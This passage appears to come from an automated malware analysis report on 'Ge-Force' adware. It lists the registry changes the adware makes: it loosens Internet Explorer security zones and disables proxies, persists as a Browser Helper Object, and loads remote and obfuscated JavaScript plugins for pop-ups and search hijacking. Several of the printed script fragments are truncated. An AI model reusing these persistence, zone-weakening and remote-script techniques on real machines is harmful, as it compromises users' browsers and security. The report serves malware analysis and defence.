"SavedLegacySettings" = "3C 00 00 00 14 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D1 3B B8 98 C0 3E 1C 13 AA 25 7E 13 60 E7 DA C3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Worm deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process Ge-Force-codedownloader.exe:2564 makes changes in the system registry.

The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 15 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 8A EA 02 46 B1 54 1E 18 F1 0E CA 5C 93 93 E3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Worm deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process regsvr32.exe:2416 makes changes in the system registry.

The Worm creates and/or sets the following values in system registry:

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO\CurVer]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129"

[HKCR\TypeLib\{44444444-4444-4444-4444-440644914429}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Ge-Force"

[HKCR\Interface\{66666666-6666-6666-6666-660666916629}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\VersionIndependentProgID]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129"

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO.1\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611911129}"

[HKCR\Interface\{66666666-6666-6666-6666-660666916629}]
"(Default)" = "ISandBox"

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611911129}"

[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox"

[HKCR\Interface\{55555555-5555-5555-5555-550655915529}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{44444444-4444-4444-4444-440644914429}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Interface\{55555555-5555-5555-5555-550655915529}\TypeLib]
"Version" = "1.0"

[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}]
"(Default)" = "Ge-Force"

[HKCR\Interface\{55555555-5555-5555-5555-550655915529}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644914429}"

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox"

[HKCR\TypeLib\{44444444-4444-4444-4444-440644914429}\1.0]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129 Type Library"

[HKCR\Interface\{66666666-6666-6666-6666-660666916629}\TypeLib]
"Version" = "1.0"

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622912229}"

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox.1\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622912229}"

[HKCR\Interface\{55555555-5555-5555-5555-550655915529}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\InprocServer32]
"(Default)" = "%Program Files%\Ge-Force\Ge-Force-bho.dll"

[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\InprocServer32]
"(Default)" = "%Program Files%\Ge-Force\Ge-Force-bho.dll"

[HKCR\Interface\{66666666-6666-6666-6666-660666916629}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129"

[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\ProgID]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox.1"

[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\VersionIndependentProgID]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox"

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox.1]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox"

[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\ProgID]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO.1"

[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{66666666-6666-6666-6666-660666916629}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644914429}"

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.BHO.1]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129"

[HKCR\TypeLib\{44444444-4444-4444-4444-440644914429}\1.0\0\win32]
"(Default)" = "%Program Files%\Ge-Force\Ge-Force-bho.dll"

[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "59 CF F8 5D EB 30 6B 3C 3D 18 05 8A 10 0B BE F6"

[HKCR\Interface\{55555555-5555-5555-5555-550655915529}]
"(Default)" = "ICrossriderBHO"

[HKCR\fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox\CurVer]
"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129.Sandbox"

[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644914429}"

[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\Implemented Categories]
"(Default)" = ""

[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644914429}"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611911129}]
"NoExplorer" = "1"

"(Default)" = "fd489e8cf7fd4ea1abbfd6139cb6d3390069129"

The Worm deletes the following registry key(s):

[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\Programmable]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\TypeLib]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\Programmable]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\VersionIndependentProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\Implemented Categories]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\ProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\TypeLib]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\InprocServer32]
[HKCR\CLSID\{22222222-2222-2222-2222-220622912229}\InprocServer32]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\VersionIndependentProgID]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611911129}]
[HKCR\CLSID\{11111111-1111-1111-1111-110611911129}\ProgID]

The process Khtmovq.exe:664 makes changes in the system registry.

The Worm creates and/or sets the following values in system registry:

[HKCU\Software\Ge-Force\Plugins\192]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/192.js"

[HKCU\Software\InstalledBrowserExtensions\21836]
"69129" = "Ge-Force"

[HKCU\Software\Ge-Force\Plugins\17]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/17.js"

[HKCU\Software\Ge-Force\Plugins\242]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ3ZjZjNTYwYzFlMWExZDMzMTEwYTU3NWY1NDQ2MDIxYTE5MTY1OTQ5NWEwYzFhMTcxZTQwMWUwZTBjMTYwNTBjMWEwMzBiMWEwODQ4MGEwODEzMGE1YjBlMTk0MTFlMDEzYzA0MTI0YjFlMTc1NTJmMmIyMDJhMmEzYzI0MjAyMTM1MjcyOTViMDAxNDA2MTcxMDE2NGMzZDM4MjQzYzIyM2MzNjIwMzYyMzJjMzgzMjI2MzQyYTJjMzA1OTM1MzEyZTM0MmMzNTI2MzczZDIwMmYzYzMyMjMzYjMyMzAyYjMwMjEyZTMxM2UzMzIxMzkzYzIxMmIzYjRjMmMzZjI3MmQyMjJhMjEzZDM3M2EyMjJjM2YzYzI4MzQyODMxNTkzNTMxMmUzNDJjMzUyNjM3M2QyMDJmM2MzMjI3MzMzNjJhMmIzNTI5MmYzMTMyNDQ0ZjZjN2M0NzFjMTAxZTFlMWUzMzExMGE1NzVmNTQ0NjAyMWExOTE2MTA1YzVhNGExZDBhMTkxYTQzMTUwYjA5MDUxNTFkMGEwZDBmMTkwMzRkMGYxYjAzMWI0YjAwMWQ0MjE1MDQzOTE3MDI1YTBlMTk1MTJjMjAyNTJmMzkyYzM1MzAyZjMxMjQyMjVlMDUwNzE2MDYwMDE4NDgzZTMzMjEzOTMxMmMyNzMwMzgyNzJmMzMzNzIzMjczYTNkMjA1NzMxMzIyNTMxMjkyNjM2MjYyZDJlMmIzZjM5MjYzZTIxMjAzYTIwMmYyYTMyMzUzNjI0MmEyYzMwM2IzNTQ4MmYzNDIyMjgzMTNhMzAyZDM5M2UyMTI3M2EzOTNiMjQzOTIxNTczMTMyMjUzMTI5MjYzNjI2MmQyZTJiM2YzOTIyMzYyNTNhM2EyNTI3MmIzMjM5NDE0YTdmNmM1NjE0MDYxYjBhMGYwZDJmMTE0NzRlNDQ1ODVhNWY2YzFl', 'fuetdjnmfc'); }"

[HKCU\Software\Ge-Force\Plugins\22]
"Name" = "resources"

[HKCU\Software\Ge-Force\Plugins\39]
"Version" = "5"

[HKCU\Software\Ge-Force\Plugins\9]
"JavaScript" = "appAPI.hooks.addHook(searchEngine,(function(a){return function(){var f={keyDelay:1000},e,h;return{init:function(i){e=this;this.addEngine({name:google,url:google,input:input[name=q],results:#rso,result:'

'});this.addEngine({name:bing,url:bing.com,input:input[name=q],results:#results > ul,result:'

'});this.addEngine({name:yandex,url:yandex.ru,input:form.b-head-search input.b-form-input__input,form.b-search input.b-form-input__input,results:.b-body-items > ol,result:'

'});this.addEngine({name:yandex,url:yandex.com,input:form.b-search input.b-form-input__input,#searchInput,results:.b-serp2-list__portion,result:'

'});this.addEngine({name:yahoo,url:yahoo.com,input:input[name=p],results:#web ol:eq(0),result:

});this.addEngine({name:yahoo,url:search.yahoo.com,input:input[name=p],results:#web ol:eq(0),result:

});this.addEngine({name:ask,url"

[HKCU\Software\Ge-Force\Plugins\301]
"Version" = "2"

[HKCU\Software\Ge-Force\Plugins\262]
"URL" = "http://js.newstatsdemosrv.com/plugins/mins/262.js"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Ge-Force\Plugins\17]
"Name" = "jQuery"

[HKCU\Software\Ge-Force\Manifest]
"PublisherId" = "21836"

[HKCU\Software\Ge-Force\Plugins\262]
"Name" = "pops_5_j_m"

[HKCU\Software\Ge-Force\Plugins]
"PopupPluginList" = "42,38,46,41,44,39,35,43,36,4,14,78,13,64,207,47,182,72,94"

[HKCU\Software\Ge-Force\Plugins\13]
"JavaScript" = "(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection();}else{if(document.getSelection){return document.getSelection();}else{var f=document.selection&&document.selection.createRange();if(f.text){return f.text;}return false;}}return false;}if(e==null){a.debug(selectedText: no callback function provided.);return;}if(c==null){c={};}c.lastSelection=;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){caseundefined:b=$jquery(body);break;caseobject:if(c.element instanceof jQuery){b=c.element;}else{a.debug(selectedText: element provided as an unrecorgnize object.);return;}break;casestring:b=$jquery(c.element);break;default:a.debug(selectedText: unknown element.);return;}b.mouseup(function(g){var f=d();if(f&&String(f)==c.lastSelection){c.lastSelection=;return;}else{c.lastSelection=String(f);}if(f&&String(f).length>=c.minlength&&String(f).length
[HKCU\Software\Ge-Force\Plugins\242]
"Version" = "4"

[HKCU\Software\Ge-Force\Plugins\38]
"Name" = "IECallbacks"

[HKCU\Software\Ge-Force\Plugins\72]
"Version" = "5"

[HKCU\Software\Ge-Force\Plugins\44]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(a){appAPI.dns={};appAPI.dns.resolveIP=function(b){return a.resolveIp(b);};appAPI.fetchUrl=function(b){return a.fetchUrl(b);};appAPI.openURL=function(e,d){var c;if(typeof e===object){c=e;if(typeof a.openUrlEx!==undefined){a.openUrlEx(appAPI.JSON.stringify(c));return;}else{d=c.where;e=c.url;}}if(typeof e!==string){console.error(appAPI.openURL - Invalid parameter. Expected string (1st param) but got: (typeof e));return;}if(d!==current&&d!==tab&&d!==window&&d!==popup){console.error(appAPI.openURL - Invalid parameter. Expected current/tab/window (2nd param) but got: d);return;}if(typeof a.openUrlEx!==undefined){var f=(document&&document.documentElement&&document.documentElement.clientHeight)?document.documentElement.clientHeight 100:100;var h=(document&&document.documentElement&&document.documentElement.clientWidth)?document.documentElement.clientWidth 80:100;var g=(window&&window.screenTop)?((window.screenTop-20)
[HKCU\Software\Ge-Force\Plugins\43]
"Name" = "IEMessaging"

[HKCU\Software\Ge-Force\Plugins\337]
"JavaScript" = "appAPI.internal.monetization=appAPI.internal.monetization||{};if(typeof appAPI.internal.monetization.plugins===undefined){appAPI.internal.monetization.plugins={};}appAPI.internal.monetization.plugins[337]=function(){if(appAPI.isBackground){return;}if(!appAPI.internal.monetization.shouldRunByVertical(337,[pops])){return;}new (appAPI.internal.monetization.plugins.ICMBaseManager({namespace:TEN}))();};"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Ge-Force\Plugins\288]
"URL" = "http://js.newstatsdemosrv.com/plugins/mins/288.js"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8769e10b-79b7-42b2-9658-9540187841f5}]
"AppPath" = "%Program Files%\Ge-Force"

[HKCU\Software\Ge-Force\Plugins\102]
"Name" = "dealply_m"

[HKCU\Software\Ge-Force\Plugins\7]
"Name" = "hooks"

[HKCU\Software\Ge-Force\Installer]
"CodeDownloadFbDomain" = "http://js.clientdemocloud.com"

[HKCU\Software\Ge-Force\Plugins\14]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/14.js"

[HKCU\Software\Ge-Force\Manifest]
"UninstallerOfferUrl" = "NA"
"DisableIe" = "true"

[HKCU\Software\Ge-Force\Plugins\246]
"JavaScript" = "var _0x6ef5=[""\x69\x6E\x73\x74\x61\x6C\x6C\x65\x72""

[HKCU\Software\Ge-Force\Installer]
"DefaultBrowser" = "ie"

[HKCU\Software\Ge-Force\Plugins\337]
"Name" = "icm_ten_m"

[HKCU\Software\Ge-Force\Plugins\39]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/39.js"

[HKCU\Software\Ge-Force\Plugins\193]
"Name" = "revizer_p_dynamic_b2b_m"

[HKCU\Software\Ge-Force\Plugins\301]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MTQ2ODU2NTg0YjU2NDgwNDFmMDAxZjM3MDQxNDQ5NGM0YTRlMDMwMDFiMTI0YzU3NDQxMjU5MWYxYTQ3MGU1NDBjMTkwZjAwMWU1ZDE5NWEwYzBlMTkwZDBmMTAxODAzMDUwMDQxMGMxMzBjNDQxNzFhMWM0NDE4NDEwODA1NDcwODI3MmI1MTBkMTUwMzExMTM1ZTA4MTcwNzFjMGExZDA4MGMzZjFjNTYyOTM1MmYzOTNiM2MzMTI0MzEyZjMzMzgzMzI4MzUyMjMyMjkzMTJmMjkzNTRhMDgxYjFhMGMwMjBhMTIzNTA1MDgwZTQ5MzAzZDM1MmEyNDI1MzkzZTIyMzAyYTMwMjkzYjI0MjMyNDM4MzkyZDMwMjEzOTNjMmUyOTM1NGEwOTA2MDAxNTA1MWQxOTM1MDUwODBlNDkzMDNkMzUyYTI0MjUzOTNlMjIzMDJhMzAyOTNhMzkzOTNkM2YyZTI2MzAzZDUwMTkxYjA2MjMyODU2MmIzMDIxMjQzNzM4MjUzODI1MmYzMTNkM2QzNzI4M2IyOTIzMjgzNDJiNDkwMzA2MDgyNTE3MDcwOTU2MmIzMDIxMjQzNzM4MjUzODI1MmYzMTNkM2QzNzI4M2IyOTI0MmQyNjMxMzAzZDUwMzEyOTNmMjk1MTM0MmIyYzMwMzkyYjM4MjQyMzI4MmUyNjMwMmIzODJiM2YzNzI2MjAyZTI2MzAzNzI1M2QzOTI5MjMyODM0MmI0OTExMDMxYTIyMzI1NzMzMzQzNzNkMmQyNTJiMzkzZjJlMjkzOTJiMmEzYTIyM2QyNTMyMmYyODM0MjczYTIwMjkzMTJmMjkzNTRhMTk0OTMwM2QyNDM2MmYyOTM1NGU0NzdlNGY0MjU2NTg0OTFlMWUxODFiMDczYTEwMWE1YTUxNTY0ODA0MWYwMDFmMTE0YzU3NDQxMjU5MWYxYTQ3MGU1NDBjMTkwZjAwMWU"

[HKLM\SOFTWARE\Ge-Force\IE\Profiles]
"S-1-5-21-1844237615-1960408961-1801674531-1003" = "1"

[HKCU\Software\Ge-Force\Plugins\7]
"JavaScript" = "appAPI.hooks={$:$jquery_171,hooks:{},addHook:function(a,b){this.hooks[a]=b;},removeHook:function(a){delete this.hooks[a];},register:function(b,a){return this.hooks[b]?new (this.$.Class.extend(this.$.extend(this.getClass(),this.$.isFunction(this.hooks[b])?this.hooks[b]():this.hooks[b])))(a):null;},getClass:(function(a){return function(){return{listeners:[],addListener:function(b,c){this.listeners.push({name:b,fn:c});},removeListener:function(c,d){var b=[];a.each(this.listeners,function(e,f){if(c!=f.name&&d!=f.fn){b.push(f);}});this.listeners=b;},fireEvent:function(b,c){a.each(this.listeners,a.proxy(function(d,e){if(b==e.name){e.fn.call(this,c);}},this));}};};}($jquery_171))};"

[HKCU\Software\Ge-Force\Plugins\246]
"Name" = "setup"

[HKCU\Software\Ge-Force\Installer]
"Time" = "1421039403"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{fb5a1bf6-0b40-4288-916a-b70d325b0949}]
"Policy" = "3"

[HKCU\Software\Ge-Force\Plugins\184]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/184.js"

[HKCU\Software\Ge-Force\Plugins\40]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/40.js"

[HKCU\Software\Ge-Force\Installer]
"AdditionalInfo" = "{""asw"":[0, 1073750528, -2147483648, 0],""browser_name"":""ie""
"StatsDomain" = "http://stats.newstatsclientcloud.com"

[HKCU\Software\Ge-Force\Plugins\263]
"Name" = "intext_5_j_m"

[HKCU\Software\Ge-Force\Plugins\36]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}appAPI.isBackground=true;appAPI.tabId=BG;appAPI.internal.scope=Consts.SCOPE.BACKGROUND;appAPI.openURL=function(c,b){if(typeof c===undefined){return;}var a;if(typeof c===object){a=c;}else{a={url:c,where:b};}appAPI.internal.message.send({eventName:openURL,eventContent:a});};appAPI.internal.runHelper=function(a){if(typeof a!==string){console.error(appAPI.runHelper - Invalid parameter. Expected string (1st param) but got: (typeof a));return;}appAPI.internal.message.send({eventName:runHelper,eventContent:a});};window.alert=function(a){a=(a===null?null:a);a=(typeof a===undefined?undefined:a);appAPIinternal.alert(a);};appAPI.internal._isMonitorAPISupported_=function(){return(typeof appAPIinternal.supportMonitor!==undefined);};window.open=function(b,a,d,c){appAPI.internal.message.send({eventName:windowOpen,eveI"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Ge-Force\Plugins\184]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ2NTY2NDUwYzE4MDcxZDIyMDAwYTRkNTU0NzQ2MDQwNzE5MDc0ODQ5NDAwMTE3MTc0MjFkMDIwNzAwMDkwZDAzMDIwOTFjMDMwZTU5MTEwOTAyNDAwOTE0MWYxMTQyMWIxZDAxMDYwYzQ5MGUxZjRjMjIwNTFiMDEwNjAxMmUwMDUxMzY1NTM2NDYyNzVkNWMyNjQ5MmU0MzVlNDM1ZjIzNWQ1ZTU2NDkyZDRhMmM0NzVmNTY1ZjVlNTI1NTViMzc1YzQ3MzQ1MDJhNDkzNDBkMTgxNjI0MTM0ZjM1MGUwMzAyMTc0YTIzMGMwNTA2MDgwYTFkMmUyMDUxNDE1ZDQ3NDI1NjQ5M2YxNTBiMDgwNjBlMDMzYzA3MDIwYTVhM2IzMzMwM2YzODIxMzUzZDI2MjMyMTNlMmMyYzI3MjIzOTIxMmUyYTIxMzMyYzRiMjMxZDA5MDMwZDA2MTYyNTE3NTAyODJkMjUzZDIwMzQzNzNlM2EyOTMyMjAzOTJhMzczMzIxMjIzNzI4MzMyZDM1M2EyZDM4MmQyODJjMzI1NTVlNmM2NjRkMGYxMDE4MDMxZTIyMDAwYTRkNTU0NzQ2MDQwNzE5MDcwMTVjNDA0MDA5MTQxZjVkMDMxODAyMTQwMDBkMGIwMTAxMDMxZDE0NWMwNTAwMDI0ODBhMWMwMDBmNTgxZTA5MDgwNjA0NGEwNjAwNTIzODAwMGYwODA2MDkyZDA4NGUyODRmMzM1MjJlNWQ1NDI1NDEzMTVkNDQ0NjRiMmE1ZDU2NTU0MTMyNTQzNjQyNGI1ZjVmNTY1MTVkNDQyOTQ2NDIyMDU5MmE0MTM3MDUwNzA4M2UxNjViM2MwZTBiMDExZjU1M2QxNjAwMTIwMTBhMTUyZDI4NGU1ZjQ3NDI1NjVmNDkzNzE2MDMxNzE4MTQwNjI4MGUwMjAyNTkzMzJjMmUyNTNkMzUzYzNkMmUyMDI5MjE"

[HKCU\Software\Ge-Force\Plugins\350]
"URL" = "http://js.newstatsdemosrv.com/plugins/mins/350.js"

[HKCU\Software\Ge-Force\Plugins\177]
"Name" = "crossriderDashboard"

[HKCU\Software\Ge-Force\Plugins\21]
"Name" = "debug"

[HKCU\Software\Ge-Force\Plugins\42]
"Name" = "IEInternal"

[HKCU\Software\Ge-Force\Plugins\45]
"URL" = "http://js.newstatsclientcloud.com/plugins/mins/45.js"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9eeb51b4-fe68-4297-af9a-8d5f04c3f631}]
"AppPath" = "%Program Files%\Ge-Force"

[HKCU\Software\Ge-Force\Plugins\38]
"Version" = "4"

[HKCU\Software\Ge-Force\Plugins\356]
"Name" = "icm_man_m"

[HKCU\Software\Ge-Force\Manifest]
"EnableSearchIE" = "false"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Ge-Force\Plugins\223]
"Name" = "imonomy_m"

[HKCU\Software\Ge-Force\Plugins\78]
"JavaScript" = "if(typeof jQuery!==undefined&&(jQuery)&&typeof window.navigator!==undefined&&typeof window.navigator.userAgent!==undefined){(function(d,c,e){var a,b;d.uaMatch=function(h){h=h.toLowerCase();var g=/(opr)[\/]([\w.] )/.exec(h)||/(chrome)[ \/]([\w.] )/.exec(h)||/(firefox)[ \/]([\w.] )/.exec(h)||/(webkit)[ \/]([\w.] )/.exec(h)||/(opera)(?:.*version|)[ \/]([\w.] )/.exec(h)||/(msie) ([\w.] )/.exec(h)||h.indexOf(trident)>=0&&/(rv)(?::| )([\w.] )/.exec(h)||h.indexOf(compatible)
[HKCU\Software\InstalledBrowserExtensions\iWebar]
"69129" = "Ge-Force"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
